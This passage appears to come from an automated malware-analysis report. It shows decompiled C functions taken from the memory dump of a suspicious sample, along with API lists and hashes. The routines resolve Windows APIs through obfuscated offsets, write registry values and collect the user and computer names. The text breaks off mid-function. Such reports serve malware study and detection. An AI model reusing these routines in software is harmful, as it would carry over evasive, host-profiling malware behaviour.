                                                                                                                                                                                                                                          					_t2 = _t26 + 0x112e769; // 0x7243775a
                                                                                                                                                                                                                                          					_v8 = 0x7f;
                                                                                                                                                                                                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                          					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                                                          						E0112147E(_t54);
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t30 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t5 = _t30 + 0x112e756; // 0x614d775a
                                                                                                                                                                                                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                          						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                          							_t33 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							_t7 = _t33 + 0x112e40b; // 0x6e55775a
                                                                                                                                                                                                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                          							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                          							if(_t35 == 0) {
                                                                                                                                                                                                                                          								goto L8;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t36 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          								_t9 = _t36 + 0x112e4d2; // 0x4e6c7452
                                                                                                                                                                                                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                          								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                          								if(_t38 == 0) {
                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t39 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          									_t11 = _t39 + 0x112e779; // 0x6c43775a
                                                                                                                                                                                                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                          									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                          									if(_t41 == 0) {
                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                          										_t44 = E01127B01(_t54, _a8);
                                                                                                                                                                                                                                          										_v8 = _t44;
                                                                                                                                                                                                                                          										if(_t44 != 0) {
                                                                                                                                                                                                                                          											goto L8;
                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                          											 *_a12 = _t54;
                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                          0x011257e7
                                                                                                                                                                                                                                          0x011257eb
                                                                                                                                                                                                                                          0x011258ad
                                                                                                                                                                                                                                          0x011257f1
                                                                                                                                                                                                                                          0x011257f1
                                                                                                                                                                                                                                          0x011257f6
                                                                                                                                                                                                                                          0x01125809
                                                                                                                                                                                                                                          0x0112580b
                                                                                                                                                                                                                                          0x01125810
                                                                                                                                                                                                                                          0x01125818
                                                                                                                                                                                                                                          0x0112581f
                                                                                                                                                                                                                                          0x01125821
                                                                                                                                                                                                                                          0x01125826
                                                                                                                                                                                                                                          0x011258a5
                                                                                                                                                                                                                                          0x011258a6
                                                                                                                                                                                                                                          0x01125828
                                                                                                                                                                                                                                          0x01125828
                                                                                                                                                                                                                                          0x0112582d
                                                                                                                                                                                                                                          0x01125835
                                                                                                                                                                                                                                          0x01125837
                                                                                                                                                                                                                                          0x0112583c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112583e
                                                                                                                                                                                                                                          0x0112583e
                                                                                                                                                                                                                                          0x01125843
                                                                                                                                                                                                                                          0x0112584b
                                                                                                                                                                                                                                          0x0112584d
                                                                                                                                                                                                                                          0x01125852
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01125854
                                                                                                                                                                                                                                          0x01125854
                                                                                                                                                                                                                                          0x01125859
                                                                                                                                                                                                                                          0x01125861
                                                                                                                                                                                                                                          0x01125863
                                                                                                                                                                                                                                          0x01125868
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112586a
                                                                                                                                                                                                                                          0x0112586a
                                                                                                                                                                                                                                          0x0112586f
                                                                                                                                                                                                                                          0x01125877
                                                                                                                                                                                                                                          0x01125879
                                                                                                                                                                                                                                          0x0112587e
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01125880
                                                                                                                                                                                                                                          0x01125886
                                                                                                                                                                                                                                          0x0112588b
                                                                                                                                                                                                                                          0x01125892
                                                                                                                                                                                                                                          0x01125897
                                                                                                                                                                                                                                          0x0112589c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112589e
                                                                                                                                                                                                                                          0x011258a1
                                                                                                                                                                                                                                          0x011258a1
                                                                                                                                                                                                                                          0x0112589c
                                                                                                                                                                                                                                          0x0112587e
                                                                                                                                                                                                                                          0x01125868
                                                                                                                                                                                                                                          0x01125852
                                                                                                                                                                                                                                          0x0112583c
                                                                                                                                                                                                                                          0x01125826
                                                                                                                                                                                                                                          0x011258bb

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 011258BE: RtlAllocateHeap.NTDLL(00000000,-00000008,01121C51), ref: 011258CA
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,011214AF,?,?,?,?,00000000,00000000), ref: 011257FD
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0112581F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 01125835
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0112584B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01125861
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01125877
                                                                                                                                                                                                                                            • Part of subcall function 01127B01: memset.NTDLL ref: 01127B80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1886625739-0
                                                                                                                                                                                                                                          • Opcode ID: 1571ef136c5370a1629fb81d06765bb542b74c12110ae71958245645f6da3324
                                                                                                                                                                                                                                          • Instruction ID: 56b618ed106ea1f4eb22953db3ae0c74c808f13435be6d8bd10a6a0f1bcf4b39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1571ef136c5370a1629fb81d06765bb542b74c12110ae71958245645f6da3324
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D321A6B0601717EFEB28DFAAD884D9AB7EDEF442047150025E908DB200EBB0E965CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                                          			E0112A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                          				signed int* _v16;
                                                                                                                                                                                                                                          				void _v284;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				char* _t60;
                                                                                                                                                                                                                                          				intOrPtr* _t61;
                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                          				char _t68;
                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                          				intOrPtr _t75;
                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                          				int _t102;
                                                                                                                                                                                                                                          				signed int* _t104;
                                                                                                                                                                                                                                          				intOrPtr* _t105;
                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t97 = __ecx;
                                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                          				_t102 = _a16;
                                                                                                                                                                                                                                          				if(_t102 == 0) {
                                                                                                                                                                                                                                          					__imp__( &_v284,  *0x112d33c);
                                                                                                                                                                                                                                          					_t96 = 0x80000002;
                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                          					_t60 = E0112A5E9(0,  &_v284);
                                                                                                                                                                                                                                          					_a8 = _t60;
                                                                                                                                                                                                                                          					if(_t60 == 0) {
                                                                                                                                                                                                                                          						_v8 = 8;
                                                                                                                                                                                                                                          						L29:
                                                                                                                                                                                                                                          						_t61 = _a20;
                                                                                                                                                                                                                                          						if(_t61 != 0) {
                                                                                                                                                                                                                                          							 *_t61 =  *_t61 + 1;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						return _v8;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t105 = _a24;
                                                                                                                                                                                                                                          					if(E0112621D(_t97, _t105, _t96, _t60) != 0) {
                                                                                                                                                                                                                                          						L27:
                                                                                                                                                                                                                                          						E0112147E(_a8);
                                                                                                                                                                                                                                          						goto L29;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t65 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t16 = _t65 + 0x112e8de; // 0x65696c43
                                                                                                                                                                                                                                          					_t68 = E0112A5E9(0, _t16);
                                                                                                                                                                                                                                          					_a24 = _t68;
                                                                                                                                                                                                                                          					if(_t68 == 0) {
                                                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                                                          						_t29 = _t105 + 0x14; // 0x102
                                                                                                                                                                                                                                          						_t33 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          						if(E01124C9A( *_t33, _t96, _a8,  *0x112d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                                                                                                                                                                                                                          							_t72 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							if(_t102 == 0) {
                                                                                                                                                                                                                                          								_t35 = _t72 + 0x112ea54; // 0x4d4c4b48
                                                                                                                                                                                                                                          								_t73 = _t35;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								_t34 = _t72 + 0x112ea4f; // 0x55434b48
                                                                                                                                                                                                                                          								_t73 = _t34;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							if(E011230FC( &_a24, _t73,  *0x112d334,  *0x112d338,  &_a24,  &_a16) == 0) {
                                                                                                                                                                                                                                          								if(_t102 == 0) {
                                                                                                                                                                                                                                          									_t75 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          									_t44 = _t75 + 0x112e856; // 0x74666f53
                                                                                                                                                                                                                                          									_t78 = E0112A5E9(0, _t44);
                                                                                                                                                                                                                                          									_t103 = _t78;
                                                                                                                                                                                                                                          									if(_t78 == 0) {
                                                                                                                                                                                                                                          										_v8 = 8;
                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                          										_t47 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          										E01121BC1( *_t47, _t96, _a8,  *0x112d338, _a24);
                                                                                                                                                                                                                                          										_t49 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          										E01121BC1( *_t49, _t96, _t103,  *0x112d330, _a16);
                                                                                                                                                                                                                                          										E0112147E(_t103);
                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									_t40 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          									E01121BC1( *_t40, _t96, _a8,  *0x112d338, _a24);
                                                                                                                                                                                                                                          									_t43 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          									E01121BC1( *_t43, _t96, _a8,  *0x112d330, _a16);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								if( *_t105 != 0) {
                                                                                                                                                                                                                                          									E0112147E(_a24);
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									 *_t105 = _a16;
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L27;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t21 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          					if(E011274B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                                                                                                                                                                                                                          						_t104 = _v16;
                                                                                                                                                                                                                                          						_t88 = 0x28;
                                                                                                                                                                                                                                          						if(_v12 == _t88) {
                                                                                                                                                                                                                                          							 *_t104 =  *_t104 & 0x00000000;
                                                                                                                                                                                                                                          							_t26 = _t105 + 0x10; // 0x3d0112c0
                                                                                                                                                                                                                                          							E01124C9A( *_t26, _t96, _a8, _a24, _t104);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						E0112147E(_t104);
                                                                                                                                                                                                                                          						_t102 = _a16;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E0112147E(_a24);
                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                                                                                                                          					goto L29;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					memcpy( &_v284, _a8, _t102);
                                                                                                                                                                                                                                          					__imp__(_t106 + _t102 - 0x117,  *0x112d33c);
                                                                                                                                                                                                                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                                                                                                                                                                                                                          					_t96 = 0x80000003;
                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                          0x0112a642
                                                                                                                                                                                                                                          0x0112a64b
                                                                                                                                                                                                                                          0x0112a652
                                                                                                                                                                                                                                          0x0112a657
                                                                                                                                                                                                                                          0x0112a6c6
                                                                                                                                                                                                                                          0x0112a6cc
                                                                                                                                                                                                                                          0x0112a6d1
                                                                                                                                                                                                                                          0x0112a6da
                                                                                                                                                                                                                                          0x0112a6df
                                                                                                                                                                                                                                          0x0112a6e4
                                                                                                                                                                                                                                          0x0112a858
                                                                                                                                                                                                                                          0x0112a85f
                                                                                                                                                                                                                                          0x0112a85f
                                                                                                                                                                                                                                          0x0112a864
                                                                                                                                                                                                                                          0x0112a866
                                                                                                                                                                                                                                          0x0112a866
                                                                                                                                                                                                                                          0x0112a86f
                                                                                                                                                                                                                                          0x0112a86f
                                                                                                                                                                                                                                          0x0112a6ea
                                                                                                                                                                                                                                          0x0112a6f6
                                                                                                                                                                                                                                          0x0112a84e
                                                                                                                                                                                                                                          0x0112a851
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a851
                                                                                                                                                                                                                                          0x0112a6fc
                                                                                                                                                                                                                                          0x0112a701
                                                                                                                                                                                                                                          0x0112a70a
                                                                                                                                                                                                                                          0x0112a70f
                                                                                                                                                                                                                                          0x0112a714
                                                                                                                                                                                                                                          0x0112a75e
                                                                                                                                                                                                                                          0x0112a75e
                                                                                                                                                                                                                                          0x0112a771
                                                                                                                                                                                                                                          0x0112a77b
                                                                                                                                                                                                                                          0x0112a781
                                                                                                                                                                                                                                          0x0112a788
                                                                                                                                                                                                                                          0x0112a792
                                                                                                                                                                                                                                          0x0112a792
                                                                                                                                                                                                                                          0x0112a78a
                                                                                                                                                                                                                                          0x0112a78a
                                                                                                                                                                                                                                          0x0112a78a
                                                                                                                                                                                                                                          0x0112a78a
                                                                                                                                                                                                                                          0x0112a7b4
                                                                                                                                                                                                                                          0x0112a7bc
                                                                                                                                                                                                                                          0x0112a7ea
                                                                                                                                                                                                                                          0x0112a7ef
                                                                                                                                                                                                                                          0x0112a7f8
                                                                                                                                                                                                                                          0x0112a7fd
                                                                                                                                                                                                                                          0x0112a801
                                                                                                                                                                                                                                          0x0112a833
                                                                                                                                                                                                                                          0x0112a803
                                                                                                                                                                                                                                          0x0112a810
                                                                                                                                                                                                                                          0x0112a813
                                                                                                                                                                                                                                          0x0112a823
                                                                                                                                                                                                                                          0x0112a826
                                                                                                                                                                                                                                          0x0112a82c
                                                                                                                                                                                                                                          0x0112a82c
                                                                                                                                                                                                                                          0x0112a7be
                                                                                                                                                                                                                                          0x0112a7cb
                                                                                                                                                                                                                                          0x0112a7ce
                                                                                                                                                                                                                                          0x0112a7e0
                                                                                                                                                                                                                                          0x0112a7e3
                                                                                                                                                                                                                                          0x0112a7e3
                                                                                                                                                                                                                                          0x0112a83d
                                                                                                                                                                                                                                          0x0112a849
                                                                                                                                                                                                                                          0x0112a83f
                                                                                                                                                                                                                                          0x0112a842
                                                                                                                                                                                                                                          0x0112a842
                                                                                                                                                                                                                                          0x0112a83d
                                                                                                                                                                                                                                          0x0112a7b4
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a77b
                                                                                                                                                                                                                                          0x0112a723
                                                                                                                                                                                                                                          0x0112a72d
                                                                                                                                                                                                                                          0x0112a72f
                                                                                                                                                                                                                                          0x0112a734
                                                                                                                                                                                                                                          0x0112a738
                                                                                                                                                                                                                                          0x0112a73a
                                                                                                                                                                                                                                          0x0112a745
                                                                                                                                                                                                                                          0x0112a748
                                                                                                                                                                                                                                          0x0112a748
                                                                                                                                                                                                                                          0x0112a74e
                                                                                                                                                                                                                                          0x0112a753
                                                                                                                                                                                                                                          0x0112a753
                                                                                                                                                                                                                                          0x0112a759
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a759
                                                                                                                                                                                                                                          0x0112a65c
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a683
                                                                                                                                                                                                                                          0x0112a68e
                                                                                                                                                                                                                                          0x0112a6a4
                                                                                                                                                                                                                                          0x0112a6aa
                                                                                                                                                                                                                                          0x0112a6b2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x0112a6b2

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StrChrA.SHLWAPI(0112553C,0000005F,00000000,00000000,00000104), ref: 0112A675
                                                                                                                                                                                                                                          • memcpy.NTDLL(?,0112553C,?), ref: 0112A68E
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?), ref: 0112A6A4
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: lstrlen.KERNEL32(?,00000000,0112D330,00000001,0112937A,0112D00C,0112D00C,00000000,00000005,00000000,00000000,?,?,?,0112207E,?), ref: 0112A5F2
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: mbstowcs.NTDLL ref: 0112A619
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: memset.NTDLL ref: 0112A62B
                                                                                                                                                                                                                                            • Part of subcall function 01121BC1: lstrlenW.KERNEL32(0112553C,?,?,0112A818,3D0112C0,80000002,0112553C,01129642,74666F53,4D4C4B48,01129642,?,3D0112C0,80000002,0112553C,?), ref: 01121BE1
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 0112A6C6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                                                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                                                                          • API String ID: 2598994505-2967466578
                                                                                                                                                                                                                                          • Opcode ID: 24859d3d43f354396197f2885b6abfed6625cbeac63b73db74ba832b910e84aa
                                                                                                                                                                                                                                          • Instruction ID: 0c619a85cedc4acb238feeabdb399ed19ea7ed11ed86aa6bd0e32e074c449ec0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24859d3d43f354396197f2885b6abfed6625cbeac63b73db74ba832b910e84aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB519E7250021AFFDF2A9FA4ED40E9A3BB9EF14304F108428FA1597520EB31D975DB10
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                                                                          			E01127C75(char* __eax) {
                                                                                                                                                                                                                                          				char* _t8;
                                                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                                                          				char* _t21;
                                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                                          				char* _t24;
                                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                                          				void* _t27;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t21 = __eax;
                                                                                                                                                                                                                                          				_push(0x20);
                                                                                                                                                                                                                                          				_t23 = 1;
                                                                                                                                                                                                                                          				_push(__eax);
                                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                                          					_t8 = StrChrA();
                                                                                                                                                                                                                                          					if(_t8 == 0) {
                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t23 = _t23 + 1;
                                                                                                                                                                                                                                          					_push(0x20);
                                                                                                                                                                                                                                          					_push( &(_t8[1]));
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t12 = E011258BE(_t23 << 2);
                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                                                                                                                                                                          				if(_t12 != 0) {
                                                                                                                                                                                                                                          					StrTrimA(_t21, 0x112c28c);
                                                                                                                                                                                                                                          					_t26 = 0;
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						_t24 = StrChrA(_t21, 0x20);
                                                                                                                                                                                                                                          						if(_t24 != 0) {
                                                                                                                                                                                                                                          							 *_t24 = 0;
                                                                                                                                                                                                                                          							_t24 =  &(_t24[1]);
                                                                                                                                                                                                                                          							StrTrimA(_t24, 0x112c28c);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                                                                          						 *( *_t2 + _t26 * 4) = _t21;
                                                                                                                                                                                                                                          						_t26 = _t26 + 1;
                                                                                                                                                                                                                                          						_t21 = _t24;
                                                                                                                                                                                                                                          					} while (_t24 != 0);
                                                                                                                                                                                                                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                                                                                                                                                                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                          0x01127c80
                                                                                                                                                                                                                                          0x01127c84
                                                                                                                                                                                                                                          0x01127c86
                                                                                                                                                                                                                                          0x01127c87
                                                                                                                                                                                                                                          0x01127c8f
                                                                                                                                                                                                                                          0x01127c8f
                                                                                                                                                                                                                                          0x01127c93
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01127c8a
                                                                                                                                                                                                                                          0x01127c8b
                                                                                                                                                                                                                                          0x01127c8e
                                                                                                                                                                                                                                          0x01127c8e
                                                                                                                                                                                                                                          0x01127c9b
                                                                                                                                                                                                                                          0x01127ca0
                                                                                                                                                                                                                                          0x01127ca6
                                                                                                                                                                                                                                          0x01127cae
                                                                                                                                                                                                                                          0x01127cb4
                                                                                                                                                                                                                                          0x01127cb6
                                                                                                                                                                                                                                          0x01127cbb
                                                                                                                                                                                                                                          0x01127cbf
                                                                                                                                                                                                                                          0x01127cc1
                                                                                                                                                                                                                                          0x01127cc4
                                                                                                                                                                                                                                          0x01127ccb
                                                                                                                                                                                                                                          0x01127ccb
                                                                                                                                                                                                                                          0x01127cd1
                                                                                                                                                                                                                                          0x01127cd5
                                                                                                                                                                                                                                          0x01127cd8
                                                                                                                                                                                                                                          0x01127cd9
                                                                                                                                                                                                                                          0x01127cdb
                                                                                                                                                                                                                                          0x01127ce3
                                                                                                                                                                                                                                          0x01127ce7
                                                                                                                                                                                                                                          0x01127ce7
                                                                                                                                                                                                                                          0x01127cf4

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StrChrA.SHLWAPI(?,00000020,00000000,056495AC,?,?,?,01124C85,056495AC,?,?,?,01124A8B,?,?,?), ref: 01127C8F
                                                                                                                                                                                                                                          • StrTrimA.SHLWAPI(?,0112C28C,00000002,?,?,?,01124C85,056495AC,?,?,?,01124A8B,?,?,?,4D283A53), ref: 01127CAE
                                                                                                                                                                                                                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,01124C85,056495AC,?,?,?,01124A8B,?,?,?,4D283A53,?), ref: 01127CB9
                                                                                                                                                                                                                                          • StrTrimA.SHLWAPI(00000001,0112C28C,?,?,?,01124C85,056495AC,?,?,?,01124A8B,?,?,?,4D283A53,?), ref: 01127CCB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Trim
                                                                                                                                                                                                                                          • String ID: S:(M
                                                                                                                                                                                                                                          • API String ID: 3043112668-2217774225
                                                                                                                                                                                                                                          • Opcode ID: e4d73da74897d1134b1e4d880293e31364dcc9628e927af2b5c3abf22206bcaa
                                                                                                                                                                                                                                          • Instruction ID: 2ef633426fa084251b8ed67cb793bc676594e69f16929e3b6ad14a5e4e456308
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4d73da74897d1134b1e4d880293e31364dcc9628e927af2b5c3abf22206bcaa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01B5716053326BD2399E7ADC48F3BBE98EB56AA0F110518F951C7281DB60C82182F4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E0112614A() {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                                                          				long _t43;
                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                          				short _t51;
                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                          				int _t56;
                                                                                                                                                                                                                                          				int _t57;
                                                                                                                                                                                                                                          				char* _t64;
                                                                                                                                                                                                                                          				short* _t67;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                          				GetUserNameW(0,  &_v8);
                                                                                                                                                                                                                                          				_t39 = _v8;
                                                                                                                                                                                                                                          				if(_t39 != 0) {
                                                                                                                                                                                                                                          					_v12 = _t39;
                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                          					GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                          					_t43 = _v8;
